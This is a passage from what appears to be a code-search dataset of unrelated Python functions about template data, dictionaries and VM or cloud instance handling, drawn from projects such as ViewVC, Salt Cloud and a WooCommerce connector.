ghost_app_schema['environment_infos']['schema']['root_block_device']['schema']['size']['min']\n app['environment_infos']['root_block_device']['size'] = block_min_size\n\n root_block_name = self.environment_infos.form.root_block_device_name.data\n app['environment_infos']['root_block_device']['name'] = root_block_name or ''\n\n app['environment_infos']['optional_volumes'] = []\n for form_opt_vol in self.environment_infos.form.optional_volumes:\n opt_vol = {}\n if form_opt_vol.device_name.data:\n opt_vol['device_name'] = form_opt_vol.device_name.data\n if form_opt_vol.volume_type.data:\n opt_vol['volume_type'] = form_opt_vol.volume_type.data\n if form_opt_vol.volume_size.data:\n opt_vol['volume_size'] = form_opt_vol.volume_size.data\n if form_opt_vol.iops.data:\n opt_vol['iops'] = form_opt_vol.iops.data\n if form_opt_vol.launch_block_device_mappings.data:\n opt_vol['launch_block_device_mappings'] = form_opt_vol.launch_block_device_mappings.data\n app['environment_infos']['optional_volumes'].append(opt_vol)\n\n app['environment_infos']['instance_tags'] = []\n for form_tag in self.environment_infos.form.instance_tags:\n tag = {}\n if form_tag.tag_name.data:\n tag['tag_name'] = form_tag.tag_name.data\n tag['tag_value'] = form_tag.tag_value.data\n app['environment_infos']['instance_tags'].append(tag)", "def post(request):\n # load request json\n try:\n request_content = json.loads(request.body)\n except JSONDecodeError as e:\n return failed(status=1000001)\n\n # validate request data\n schema = SCHEMA.copy()\n schema['required'] = ['name', 'image_path']\n validate_result, msg = utils.validate_json(data=request_content, schema=schema)\n if validate_result != 0:\n return failed(status=1000001, msg=msg)\n\n # create new vm template\n new_obj = VmTemplate(**request_content)\n\n # save objects\n try:\n new_obj.save()\n except IntegrityError as e:\n\n return failed(status=1001001, msg=str(e.__cause__))\n\n # return data\n data = new_obj.__dict__\n data.pop('_state')\n return success(data=data)", "def calc_template(template_def, config):\n template = Template(**template_def)\n #print \"template_def:\", template_def, \"config:\", config\n try:\n retvals = process_template(template, config, target=(None, None))\n except Exception:\n print(\"==== template ====\"); pprint(template_def)\n print(\"==== config ====\"); pprint(config)\n #traceback.print_exc()\n raise\n output = {}\n for rkey, rv in retvals.items():\n module_id, terminal_id = rkey\n module_key = str(module_id)\n output.setdefault(module_key, {})\n output[module_key][terminal_id] = rv.todict()\n return output", "def common_template_data(request, revision=None, mime_type=None):\n\n cfg = request.cfg\n\n # Initialize data dictionary members (sorted alphanumerically)\n data = TemplateData(\n {\n \"annotate_href\": None,\n \"cfg\": cfg,\n \"docroot\": (\n cfg.options.docroot is None\n and request.script_name + \"/\" + docroot_magic_path\n or cfg.options.docroot\n ),\n \"download_href\": None,\n \"download_text_href\": None,\n \"graph_href\": None,\n \"home_href\": request.script_name or \"/\",\n \"kv\": request.kv,\n \"lockinfo\": None,\n \"log_href\": None,\n \"nav_path\": nav_path(request),\n \"pathtype\": None,\n \"prefer_markup\": ezt.boolean(0),\n \"queryform_href\": None,\n \"rev\": None,\n \"revision_href\": None,\n \"rootname\": (request.rootname and request.server.escape(request.rootname) or None),\n \"rootpath\": request.rootpath,\n \"roots_href\": None,\n \"roottype\": request.roottype,\n \"rss_href\": None,\n \"tarball_href\": None,\n \"up_href\": None,\n \"username\": request.username,\n \"view\": _view_codes[request.view_func],\n \"view_href\": None,\n \"vsn\": __version__,\n \"where\": request.server.escape(request.where),\n }\n )\n\n rev = revision\n if not rev:\n rev = request.query_dict.get(\"annotate\")\n if not rev:\n rev = request.query_dict.get(\"revision\")\n if not rev and request.roottype == \"svn\":\n rev = request.query_dict.get(\"pathrev\")\n try:\n data[\"rev\"] = hasattr(request.repos, \"_getrev\") and request.repos._getrev(rev) or rev\n except vclib.InvalidRevision:\n raise ViewVCException(\"Invalid revision\", \"404 Not Found\")\n\n if request.pathtype == vclib.DIR:\n data[\"pathtype\"] = \"dir\"\n elif request.pathtype == vclib.FILE:\n data[\"pathtype\"] = \"file\"\n\n if request.path_parts:\n dir = _path_join(request.path_parts[:-1])\n data[\"up_href\"] = request.get_url(\n view_func=view_directory, where=dir, pathtype=vclib.DIR, params={}, escape=1\n )\n\n if \"roots\" in cfg.options.allowed_views:\n data[\"roots_href\"] = request.get_url(view_func=view_roots, escape=1, params={})\n\n if request.pathtype == vclib.FILE:\n fvi = get_file_view_info(request, request.where, data[\"rev\"], mime_type)\n data[\"view_href\"] = fvi.view_href\n data[\"download_href\"] = fvi.download_href\n data[\"download_text_href\"] = fvi.download_text_href\n data[\"annotate_href\"] = fvi.annotate_href\n data[\"revision_href\"] = fvi.revision_href\n data[\"prefer_markup\"] = fvi.prefer_markup\n data[\"log_href\"] = request.get_url(view_func=view_log, params={}, escape=1)\n if request.roottype == \"cvs\" and cfg.options.use_cvsgraph:\n data[\"graph_href\"] = request.get_url(view_func=view_cvsgraph, params={}, escape=1)\n file_data = request.repos.listdir(request.path_parts[:-1], request.pathrev, {})\n entries = [item for item in file_data if item.name == request.path_parts[-1]]\n if len(entries) == 1:\n request.repos.dirlogs(request.path_parts[:-1], request.pathrev, entries, {})\n data[\"lockinfo\"] = entries[0].lockinfo\n elif request.pathtype == vclib.DIR:\n data[\"view_href\"] = request.get_url(view_func=view_directory, params={}, escape=1)\n if \"tar\" in cfg.options.allowed_views:\n data[\"tarball_href\"] = request.get_url(view_func=download_tarball, params={}, escape=1)\n if request.roottype == \"svn\":\n data[\"revision_href\"] = request.get_url(\n view_func=view_revision, params={\"revision\": data[\"rev\"]}, escape=1\n )\n\n data[\"log_href\"] = request.get_url(view_func=view_log, params={}, escape=1)\n\n if is_querydb_nonempty_for_root(request):\n if request.pathtype == vclib.DIR:\n params = {}\n if request.roottype == \"cvs\" and request.pathrev:\n params[\"branch\"] = request.pathrev\n data[\"queryform_href\"] = request.get_url(\n view_func=view_queryform, params=params, escape=1\n )\n data[\"rss_href\"] = request.get_url(\n view_func=view_query, params={\"date\": \"month\", \"format\": \"rss\"}, escape=1\n )\n elif request.pathtype == vclib.FILE:\n parts = _path_parts(request.where)\n where = _path_join(parts[:-1])\n data[\"rss_href\"] = request.get_url(\n view_func=view_query,\n where=where,\n pathtype=request.pathtype,\n params={\"date\": \"month\", \"format\": \"rss\", \"file\": parts[-1], \"file_match\": \"exact\"},\n escape=1,\n )\n return data", "def _test_template_data(self):\n chars=string.ascii_uppercase + string.digits\n id = ''.join(random.choice(chars) for x in range(6))\n\n return {\n 'test_module': self.test_modulename(),\n 'driver_module': self.driver_modulename(),\n 'driver_dir': self.driver_dir(),\n 'file': self.driver_relative_path(),\n 'author': self.metadata.author,\n 'driver_name': self.metadata.driver_name,\n 'constructor': self.metadata.constructor,\n 'full_instrument_lower': self.metadata.driver_name.lower(),\n 'full_instrument_camelcase': self.driver_name_camelcase(),\n }", "def _calculate_custom_data(self):\n self.data['vms'] = Vms(self.vms, self.url)", "def create_template_dict(name, cat, boilerplate_name=None, is_common=False):\r\n return {\r\n \"display_name\": name,\r\n \"category\": cat,\r\n \"boilerplate_name\": boilerplate_name,\r\n \"is_common\": is_common\r\n }", "def prepare_template_vals(self, woo_instance, product_response):\n template_info_vals = {\n \"name\":product_response.get(\"name\"),\n \"woo_tmpl_id\":product_response.get(\"id\"),\n \"woo_instance_id\":woo_instance.id,\n \"woo_short_description\":product_response.get(\"short_description\", \"\"),\n \"woo_description\":product_response.get(\"description\", \"\"),\n \"website_published\":True if product_response[\"status\"] == \"publish\" else False,\n \"taxable\":True if product_response[\"tax_status\"] == \"taxable\" else False,\n \"woo_categ_ids\":product_response.get(\"categories\"),\n \"woo_tag_ids\":product_response.get(\"tags\"),\n \"total_variants_in_woo\":len(product_response[\"variations\"]),\n \"woo_product_type\":product_response[\"type\"],\n \"active\":True\n }\n if product_response.get(\"date_created\"):\n template_info_vals.update(\n {\"created_at\":product_response.get(\"date_created\").replace(\"T\", \" \")})\n if product_response.get(\"date_modified\"):\n template_info_vals.update(\n {\"updated_at\":product_response.get(\"date_modified\").replace(\"T\", \" \")})\n return template_info_vals", "async def _process_create_data(self, data: dict) -> dict:\n return self.SCHEMA(data)", "def parse_template(self):\n for line in self.raw_template.split(\"\\n\"):\n line = line.strip()\n if line.startswith('#m3'):\n key, val = line[3:].strip().split('=', 1)\n key = key.strip()\n val = val.strip()\n self.variables[key] = val\n\n for fitem in self.finditem.finditer(self.raw_template):\n fgrp = fitem.groups()\n categ = fgrp[0]\n name = fgrp[1]\n rest_str = fgrp[2]\n rest = {} # type: dict\n for item in rest_str.split('|'):\n item = item.strip()\n if item:\n key, val = item.split('=')\n rest[key] = val\n\n self.data[name] = (categ, rest)", "def pre_service_template_update(self, resource_id, resource_dict):\n pass", "def generate_template_dict(self):\n # Get the existing parameters\n params = super().generate_template_dict()\n\n # Add our custom parameters\n params['job_parameter_file'] = self.job_parameter_file\n params['job_output_directory'] = self.job_output_directory\n\n # Return the updated params\n return params", "def template_data(self) -> Any:\n return pulumi.get(self, \"template_data\")", "def pre_process_raw(raw: dict) -> dict:\n api_data = raw.get(\"data\", {}).get(\"apiList\", [])\n return {api[\"id\"]: api for api in api_data}", "def template_list(call=None):\n templates = {}\n session = _get_session()\n vms = session.xenapi.VM.get_all()\n for vm in vms:\n record = session.xenapi.VM.get_record(vm)\n if record[\"is_a_template\"]:\n templates[record[\"name_label\"]] = record\n return templates", "def _populate_user_and_project(self, template_dictionary, escape_db_operations=False):\n logged_user = get_logged_user()\n template_dictionary[KEY_USER] = logged_user\n show_help = logged_user is not None and logged_user.is_online_help_active()\n template_dictionary[KEY_SHOW_ONLINE_HELP] = show_help\n\n project = get_current_project()\n template_dictionary[KEY_PROJECT] = project\n if project is not None and not escape_db_operations:\n self.update_operations_count()\n return template_dictionary", "def _process_instance(self, instance):\n instance_dict = {}\n ins_zone = instance[\"zone\"]\n instance_dict[\"zone\"] = ins_zone[\n ins_zone.index(\"zones/\") + 6:len(ins_zone)]\n instance_dict[\"name\"] = instance[\"name\"]\n instance_dict[\"cloud\"] = self.kind\n instance_dict[\"status\"] = instance[\"status\"]\n instance_dict[\"type\"] = instance[\"cpuPlatform\"]\n instance_dict[\"created\"] = instance[\"creationTimestamp\"]\n instance_dict[\"id\"] = instance[\"id\"]\n instance_dict[\"kind\"] = instance[\"kind\"]\n machineTypeUrl = instance[\"machineType\"]\n instance_dict[\"machineType\"] = machineTypeUrl[machineTypeUrl.index(\n \"machineTypes/\") + 13:len(machineTypeUrl)]\n disks = instance[\"disks\"]\n disk = disks[0]\n instance_dict[\"deviceName\"] = disk[\"deviceName\"]\n instance_dict[\"diskSizeGb\"] = disk[\"diskSizeGb\"]\n licenses = disk[\"licenses\"][0]\n instance_dict[\"sourceImage\"] = licenses[\n licenses.index(\"licenses/\") + 9:len(\n licenses)]\n instance_dict[\"diskType\"] = disk[\"type\"]\n instance_dict[\"mode\"] = disk[\"mode\"]\n instance_dict[\"modified\"] = str(DateTime.now())\n\n # Network access.\n network_config = instance[\"networkInterfaces\"]\n\n if (network_config):\n network_config = network_config[0]\n access_config = network_config[\"accessConfigs\"]\n access_config = access_config[0]\n external_ip = access_config[\"natIP\"]\n instance_dict[\"public_ip\"] = external_ip\n\n return instance_dict", "def generate_page_sections_dict(self, project_page_data: dict):\n wiki_obj = WikiService()\n\n short_description = (\n f\"\\n{project_page_data['project']['shortDescription']}\\n\"\n )\n\n created_date = wiki_obj.format_date_text(\n project_page_data['project']['created']\n )\n # created_date_text = f\"\\n{created_date}\\n\" \n # due_date = wiki_obj.format_date_text(\n # project_page_data['project']['due_date']\n # )\n timeframe = (\n f\"\\n* '''Start Date:''' {created_date}\\n\"\n # f\"\\n* '''End Date:''' Estimate {due_date}\\n\"\n )\n\n\n project_url = (\n f\"\\n{project_page_data['project']['url']}\\n\"\n )\n\n hashtag = (\n project_page_data['project']['changesetComment']\n )\n hashtag = (\n project_page_data['project']['changesetComment'].replace(\n \"#\", \"<nowiki>#</nowiki>\"\n )\n )\n hashtag_text = (\n f\"\\n{hashtag}\\n\"\n )\n\n instructions_text = (\n project_page_data['project']\n ['externalSource']\n ['instructions']\n )\n instructions = (\n f\"\\n{instructions_text}\\n\"\n )\n\n per_task_instructions_text = (\n project_page_data['project']\n ['externalSource']\n ['perTaskInstructions']\n )\n per_task_instructions = (\n f\"\\n{per_task_instructions_text}\\n\"\n )\n\n imagery_text = (\n project_page_data['project']\n ['externalSource']\n ['imagery']\n )\n imagery = (\n f\"\\n{imagery_text}\\n\"\n )\n\n license_text = (\n project_page_data['project']\n ['externalSource']\n ['license']\n )\n license = (\n f\"\\n{license_text}\\n\"\n )\n\n # metrics = (\n # f\"\\n* {project_page_data.instructions}\\n\"\n # )\n # quality_assurance = (\n # f\"\\n* {project_page_data.quality_assurance}\\n\"\n # )\n\n users = project_page_data['project'][\"users\"]\n project_users = \"\"\n for user in users:\n project_users += (\n f\"\\n| {user['userId']}\\n| {user['userName']}\\n|-\"\n )\n\n \n\n project_page_sections = {\n self.short_description_section: short_description,\n self.timeframe_section: timeframe,\n # self.timeframe_section: {\n # self.created_section: created_date_text\n # }, # if choose use subsection for timeframe \n self.url_section: project_url,\n self.external_sources_section: {\n self.instructions_section: instructions,\n self.per_task_instructions_section: per_task_instructions,\n self.imagery_section: imagery,\n self.license_section: license\n },\n self.hashtag_section: hashtag_text,\n # self.instructions_section: instructions,\n # self.metrics_section: metrics,\n # self.quality_assurance_section: quality_assurance,\n self.team_user_section: {\n self.users_list_section: project_users\n }\n }\n return project_page_sections", "def refresh(self):\n script = 'Get-SCVMTemplate -ID \\\"{}\\\" -VMMServer $scvmm_server'\n try:\n data = self._get_json(script.format(self._id))\n except SCVMMSystem.PowerShellScriptError as error:\n if \"Error ID: 801\" in str(error):\n # Error ID 801 is a \"not found\" error\n data = None\n else:\n raise\n if not data:\n raise ImageNotFoundError(self._id)\n self.raw = data\n return self.raw", "def mk_data(self):\n self.data = self.DEFAULTS.copy()\n\n for template in self.raw_data.get('extends', []):\n template_data = self.load_template(template)\n self.data.update(template_data)\n\n self.data.update(self.raw_data)\n\n str_replace(self.data)\n\n if self.data.get('redirect_stderr'):\n self.data.pop('stderr')", "def context(template):\n\n return {\n v.key: v.read()\n for v in [Variable(name) for name in extract_variables(template)]\n }", "def _get_data(self):\n data = {}\n\n for name, field in self._get_fields().items():\n if isinstance(field, fields.Factory):\n # skip for factories for now\n continue\n value = getattr(self, name)\n raw_value = field.to_raw(value)\n if isinstance(field, fields.Secret):\n data[f\"__{name}\"] = raw_value\n else:\n data[name] = raw_value\n\n return data", "def create_field_template_dict(self, bids_atlas_label):\n if self.parcellation_scheme == \"NativeFreesurfer\":\n # fmt:off\n field_template = dict(\n diffusion=\"dwi/\" + self.subject + \"_desc-cmp_dwi.nii.gz\",\n bvecs=\"dwi/\" + self.subject + \"_desc-cmp_dwi.bvec\",\n bvals=\"dwi/\" + self.subject + \"_desc-cmp_dwi.bval\",\n T1=\"anat/\" + self.subject + \"_desc-head_T1w.nii.gz\",\n aseg=\"anat/\" + self.subject + \"_desc-aseg_dseg.nii.gz\",\n aparc_aseg=\"anat/\" + self.subject + \"_desc-aparcaseg_dseg.nii.gz\",\n brain=\"anat/\" + self.subject + \"_desc-brain_T1w.nii.gz\",\n brain_mask=\"anat/\" + self.subject + \"_desc-brain_mask.nii.gz\",\n wm_mask_file=\"anat/\" + self.subject + \"_label-WM_dseg.nii.gz\",\n wm_eroded=\"anat/\" + self.subject + \"_label-WM_dseg.nii.gz\",\n brain_eroded=\"anat/\" + self.subject + \"_desc-brain_mask.nii.gz\",\n csf_eroded=\"anat/\" + self.subject + \"_label-CSF_dseg.nii.gz\",\n roi_volume_s1=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_dseg.nii.gz\",\n roi_graphml_s1=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_dseg.graphml\",\n roi_volume_s2=\"anat/irrelevant.nii.gz\",\n roi_graphml_s2=\"anat/irrelevant.graphml\",\n roi_volume_s3=\"anat/irrelevant.nii.gz\",\n roi_graphml_s3=\"anat/irrelevant.graphml\",\n roi_volume_s4=\"anat/irrelevant.nii.gz\",\n roi_graphml_s4=\"anat/irrelevant.graphml\",\n roi_volume_s5=\"anat/irrelevant.nii.gz\",\n roi_graphml_s5=\"anat/irrelevant.graphml\",\n )\n # fmt:on\n elif self.parcellation_scheme == \"Custom\":\n # fmt:off\n field_template = dict(\n diffusion=\"dwi/\" + self.subject + \"_desc-cmp_dwi.nii.gz\",\n bvecs=\"dwi/\" + self.subject + \"_desc-cmp_dwi.bvec\",\n bvals=\"dwi/\" + self.subject + \"_desc-cmp_dwi.bval\",\n T1=\"anat/\" + self.subject + \"_desc-head_T1w.nii.gz\",\n aseg=\"anat/\" + self.subject + \"_desc-aseg_dseg.nii.gz\",\n aparc_aseg=\"anat/\" + self.subject + \"_desc-aparcaseg_dseg.nii.gz\",\n brain=\"anat/\" + self.subject + \"_desc-brain_T1w.nii.gz\",\n brain_mask=\"anat/\" + self.subject + \"_desc-brain_mask.nii.gz\",\n wm_mask_file=\"anat/\" + self.subject + \"_label-WM_dseg.nii.gz\",\n wm_eroded=\"anat/\" + self.subject + \"_label-WM_dseg.nii.gz\",\n brain_eroded=\"anat/\" + self.subject + \"_desc-brain_mask.nii.gz\",\n csf_eroded=\"anat/\" + self.subject + \"_label-CSF_dseg.nii.gz\",\n roi_volume_s1=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_dseg.nii.gz\",\n roi_graphml_s1=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_dseg.graphml\",\n roi_volume_s2=\"anat/irrelevant.nii.gz\",\n roi_graphml_s2=\"anat/irrelevant.graphml\",\n roi_volume_s3=\"anat/irrelevant.nii.gz\",\n roi_graphml_s3=\"anat/irrelevant.graphml\",\n roi_volume_s4=\"anat/irrelevant.nii.gz\",\n roi_graphml_s4=\"anat/irrelevant.graphml\",\n roi_volume_s5=\"anat/irrelevant.nii.gz\",\n roi_graphml_s5=\"anat/irrelevant.graphml\",\n )\n # fmt:on\n else:\n # fmt:off\n field_template = dict(\n diffusion=\"dwi/\" + self.subject + \"_desc-cmp_dwi.nii.gz\",\n bvecs=\"dwi/\" + self.subject + \"_desc-cmp_dwi.bvec\",\n bvals=\"dwi/\" + self.subject + \"_desc-cmp_dwi.bval\",\n T1=\"anat/\" + self.subject + \"_desc-head_T1w.nii.gz\",\n aseg=\"anat/\" + self.subject + \"_desc-aseg_dseg.nii.gz\",\n aparc_aseg=\"anat/\" + self.subject + \"_desc-aparcaseg_dseg.nii.gz\",\n brain=\"anat/\" + self.subject + \"_desc-brain_T1w.nii.gz\",\n brain_mask=\"anat/\" + self.subject + \"_desc-brain_mask.nii.gz\",\n wm_mask_file=\"anat/\" + self.subject + \"_label-WM_dseg.nii.gz\",\n wm_eroded=\"anat/\" + self.subject + \"_label-WM_dseg.nii.gz\",\n brain_eroded=\"anat/\" + self.subject + \"_desc-brain_mask.nii.gz\",\n csf_eroded=\"anat/\" + self.subject + \"_label-CSF_dseg.nii.gz\",\n roi_volume_s1=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale1_dseg.nii.gz\",\n roi_volume_s2=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale2_dseg.nii.gz\",\n roi_volume_s3=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale3_dseg.nii.gz\",\n roi_volume_s4=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale4_dseg.nii.gz\",\n roi_volume_s5=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale5_dseg.nii.gz\",\n roi_graphml_s1=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale1_dseg.graphml\",\n roi_graphml_s2=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale2_dseg.graphml\",\n roi_graphml_s3=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale3_dseg.graphml\",\n roi_graphml_s4=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale4_dseg.graphml\",\n roi_graphml_s5=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale5_dseg.graphml\",\n )\n # fmt:on\n return field_template", "def _build_data(self):\n licence_types = [('all', 'All')] + [(lt.pk, lt.display_name) for lt in LicenceType.objects.all()]\n data = {\n 'applications': {\n 'columnDefinitions': [],\n 'filters': {\n 'licenceType': {\n 'values': licence_types,\n },\n 'status': {\n 'values': [],\n }\n },\n 'ajax': {\n 'url': ''\n }\n },\n 'licences': {\n 'columnDefinitions': [],\n 'filters': {\n 'licenceType': {\n 'values': licence_types,\n },\n },\n 'ajax': {\n 'url': ''\n }\n },\n 'returns': {\n 'columnDefinitions': [],\n 'filters': {\n 'licenceType': {\n 'values': licence_types,\n },\n },\n 'ajax': {\n 'url': ''\n }\n }\n }\n return data", "async def _process_create_data(self, data: dict) -> dict:\n validated_data: dict = validate_language(data)\n return validated_data", "def construct_dicts(self, path):\n module_dicts = self.read_dict(path, use_superpkg=True)\n\n id_dict = dict()\n name_dict = dict()\n\n for cmd_dict in module_dicts:\n # Create a cmd template object\n cmd_temp = cmd_template.CmdTemplate(\n cmd_dict[self.OP_CODE_FIELD],\n cmd_dict[self.MNEMONIC_FIELD],\n cmd_dict[self.COMPONENT_FIELD],\n cmd_dict[self.ARGS_FIELD],\n cmd_dict[self.DESC_FIELD],\n )\n\n id_dict[cmd_dict[self.OP_CODE_FIELD]] = cmd_temp\n name_dict[cmd_dict[self.MNEMONIC_FIELD]] = cmd_temp\n\n return (id_dict, name_dict)", "def generate_object_data(self):\n object_dict = {\n 'content_type' : str(self.target_object._meta),\n 'object_id' : str(self.target_object._get_pk_val()),\n }\n return object_dict", "def generate_object_data(self):\n object_dict = {\n 'content_type' : str(self.target_object._meta),\n 'object_id' : str(self.target_object._get_pk_val()),\n }\n return object_dict", "def generate(self) -> Dict[str, Any]:\n raise NotImplementedError", "def create(vm_):\n name = vm_[\"name\"]\n record = {}\n ret = {}\n\n # fire creating event\n __utils__[\"cloud.fire_event\"](\n \"event\",\n \"starting create\",\n \"salt/cloud/{}/creating\".format(name),\n args={\"name\": name, \"profile\": vm_[\"profile\"], \"provider\": vm_[\"driver\"]},\n sock_dir=__opts__[\"sock_dir\"],\n transport=__opts__[\"transport\"],\n )\n log.debug(\"Adding %s to cloud cache.\", name)\n __utils__[\"cloud.cachedir_index_add\"](\n vm_[\"name\"], vm_[\"profile\"], \"xen\", vm_[\"driver\"]\n )\n\n # connect to xen\n session = _get_session()\n\n # determine resource pool\n resource_pool = _determine_resource_pool(session, vm_)\n\n # determine storage repo\n storage_repo = _determine_storage_repo(session, resource_pool, vm_)\n\n # build VM\n image = vm_.get(\"image\")\n clone = vm_.get(\"clone\")\n if clone is None:\n clone = True\n log.debug(\"Clone: %s \", clone)\n\n # fire event to read new vm properties (requesting)\n __utils__[\"cloud.fire_event\"](\n \"event\",\n \"requesting instance\",\n \"salt/cloud/{}/requesting\".format(name),\n sock_dir=__opts__[\"sock_dir\"],\n transport=__opts__[\"transport\"],\n )\n\n # create by cloning template\n if clone:\n _clone_vm(image, name, session)\n else:\n _copy_vm(image, name, session, storage_repo)\n\n # provision template to vm\n _provision_vm(name, session)\n vm = _get_vm(name, session)\n\n # start vm\n start(name, None, session)\n\n # get new VM\n vm = _get_vm(name, session)\n\n # wait for vm to report IP via guest tools\n _wait_for_ip(name, session)\n\n # set static IP if configured\n _set_static_ip(name, session, vm_)\n\n # if not deploying salt then exit\n deploy = vm_.get(\"deploy\", True)\n log.debug(\"delopy is set to %s\", deploy)\n if deploy:\n record = session.xenapi.VM.get_record(vm)\n if record is not None:\n _deploy_salt_minion(name, session, vm_)\n else:\n log.debug(\"The Salt minion will not be installed, deploy: %s\", vm_[\"deploy\"])\n record = session.xenapi.VM.get_record(vm)\n ret = show_instance(name)\n ret.update({\"extra\": record})\n\n __utils__[\"cloud.fire_event\"](\n \"event\",\n \"created instance\",\n \"salt/cloud/{}/created\".format(name),\n args={\"name\": name, \"profile\": vm_[\"profile\"], \"provider\": vm_[\"driver\"]},\n sock_dir=__opts__[\"sock_dir\"],\n transport=__opts__[\"transport\"],\n )\n return ret", "def _populate_menu(self, template_dictionary):\n if KEY_FIRST_RUN not in template_dictionary:\n template_dictionary[KEY_FIRST_RUN] = False\n template_dictionary[KEY_LINK_ANALYZE] = self.analyze_category_link\n template_dictionary[KEY_LINK_CONNECTIVITY_TAB] = self.connectivity_tab_link\n if KEY_BACK_PAGE not in template_dictionary:\n template_dictionary[KEY_BACK_PAGE] = False\n template_dictionary[KEY_SECTION_TITLES] = WebStructure.WEB_SECTION_TITLES\n template_dictionary[KEY_SUBSECTION_TITLES] = WebStructure.WEB_SUBSECTION_TITLES\n return template_dictionary", "def _prepare_data(\n self,\n request_data: Optional[Dict[str, Any]] = None,\n ) -> Dict[str, Any]:\n if request_data is None:\n request_data = {}\n request_data['page.rows'] = self._rows_in_page\n if self._current_row:\n request_data['page.number'] = \\\n self._current_row // self._rows_in_page + 1\n else:\n # Page number starts from 0\n page_number = self._min_row // self._rows_in_page\n # But for request page number starts from 1\n request_data['page.number'] = page_number + 1\n self._current_row = self._rows_in_page * page_number\n return request_data", "def build_private_data(self, project_update, private_data_dir):\n private_data = {'credentials': {}}\n if project_update.credential:\n credential = project_update.credential\n if credential.has_input('ssh_key_data'):\n private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')\n return private_data", "def load_template(mapping_location: str, vendorname: str) -> Dict:\n\n location = mapping_location\n\n #check if template mapping file exists\n # can be checked at the source if Invoice Parser used with GUI\n \n try:\n os.path.exists(location)\n except Exception as e:\n print(\"{0}. File not found\".format(e))\n else:\n with open(location) as t:\n mapping = json.load(t)\n\n #checking if mapping has vendorname\n try:\n mapping[vendorname]\n except KeyError as e:\n print(\"KeyError {0}. Vendor does not have a template\".format(e))\n else:\n\n template_file_location = mapping[vendorname]\n\n #checking if template file exists\n try:\n os.path.exists(template_file_location)\n except Exception as e:\n print(\"{0}. File not found\".format(e))\n else:\n with open(template_file_location) as templ:\n data = json.load(templ)\n \n return data", "def get_hypervisors(self):\n json_scheme = self.gen_def_json_scheme('GetHypervisors')\n json_obj = self.call_method_post(method='GetHypervisors', json_scheme=json_scheme)\n self.json_templates = json_obj\n d = dict(json_obj)\n for elem in d['Value']:\n hv = self.hypervisors[elem['HypervisorType']]\n for inner_elem in elem['Templates']:\n o = Template(hv)\n o.template_id = inner_elem['Id']\n o.descr = inner_elem['Description']\n o.id_code = inner_elem['IdentificationCode']\n o.name = inner_elem['Name']\n o.enabled = inner_elem['Enabled']\n if hv != 'SMART':\n for rb in inner_elem['ResourceBounds']:\n resource_type = rb['ResourceType']\n if resource_type == 1:\n o.resource_bounds.max_cpu = rb['Max']\n if resource_type == 2:\n o.resource_bounds.max_memory = rb['Max']\n if resource_type == 3:\n o.resource_bounds.hdd0 = rb['Max']\n if resource_type == 7:\n o.resource_bounds.hdd1 = rb['Max']\n if resource_type == 8:\n o.resource_bounds.hdd2 = rb['Max']\n if resource_type == 9:\n o.resource_bounds.hdd3 = rb['Max']\n self.templates.append(o)\n return True if json_obj['Success'] is 'True' else False", "def _get_vm_instance_data(self, services, deployment, deployed_app):\n internal_service, external_service = self._get_internal_external_services_set(\n services\n )\n\n data = [\n VmDetailsProperty(key=\"Image\", value=self._get_image(deployment)),\n VmDetailsProperty(\n key=\"Replicas\", value=self._get_replicas(deployment, deployed_app)\n ),\n VmDetailsProperty(\n key=\"Ready Replicas\", value=self._get_ready_replicas(deployment)\n ),\n VmDetailsProperty(\n key=\"Internal IP\", value=self.get_internal_ip(internal_service)\n ),\n VmDetailsProperty(\n key=\"Internal Ports\", value=self._get_service_ports(internal_service)\n ),\n VmDetailsProperty(\n key=\"External IP\", value=self.get_external_ip(external_service)\n ),\n VmDetailsProperty(\n key=\"External Ports\",\n value=self._get_external_service_ports(external_service),\n ),\n ]\n\n return data", "def _build_requestContext(self, startTime=datetime(1970, 1, 1, 0, 0, 0, 0, pytz.timezone(settings.TIME_ZONE)), endTime=datetime(1970, 1, 1, 0, 59, 0, 0, pytz.timezone(settings.TIME_ZONE)), data=[], tzinfo=pytz.utc):\n return {\n 'template': {},\n 'args': ({}, {}),\n 'startTime': startTime,\n 'endTime': endTime,\n 'localOnly': False,\n 'data': data,\n 'tzinfo': tzinfo\n }", "def _generate_voter_in_dict(id: bytes, timestamp: int, prep: 'Prep') -> dict:\n voter_in_dict = {\n \"id\": '0x' + bytes.hex(id),\n \"timestamp\": timestamp,\n \"address\": str(prep.address),\n \"name\": prep.name,\n \"amount\": prep.delegated\n }\n return voter_in_dict", "def render_application_template(self):\n self.pipeline_config['instance_links'] = self.retrieve_instance_links()\n jsondata = get_template(\n template_file='infrastructure/app_data.json.j2', appinfo=self.appinfo, pipeline_config=self.pipeline_config)\n return jsondata", "def test_get_templates_in_virtualization_realm(self):\n pass", "def get_instance_templates(self):\n response = self.call_api('/global/instanceTemplates')\n return {\n template['name']: template for template in response.get('items', [])\n }", "def build_response_dict(self):\n return {\n \"release\": self.settings['bookstore'][\"release\"],\n \"features\": self.settings['bookstore'][\"features\"],\n }", "def _transform(self, resource_from_api):\n for (project_id, backend_services) in resource_from_api.iteritems():\n for backend_service in backend_services:\n yield {'project_id': project_id,\n 'id': backend_service.get('id'),\n 'creation_timestamp': parser.format_timestamp(\n backend_service.get('creationTimestamp'),\n self.MYSQL_DATETIME_FORMAT),\n 'name': backend_service.get('name'),\n 'description': backend_service.get('description'),\n 'affinity_cookie_ttl_sec': self._to_int(\n backend_service.get('affinityCookieTtlSec')),\n 'backends': parser.json_stringify(\n backend_service.get('backends', [])),\n 'cdn_policy': parser.json_stringify(\n backend_service.get('cdnPolicy', 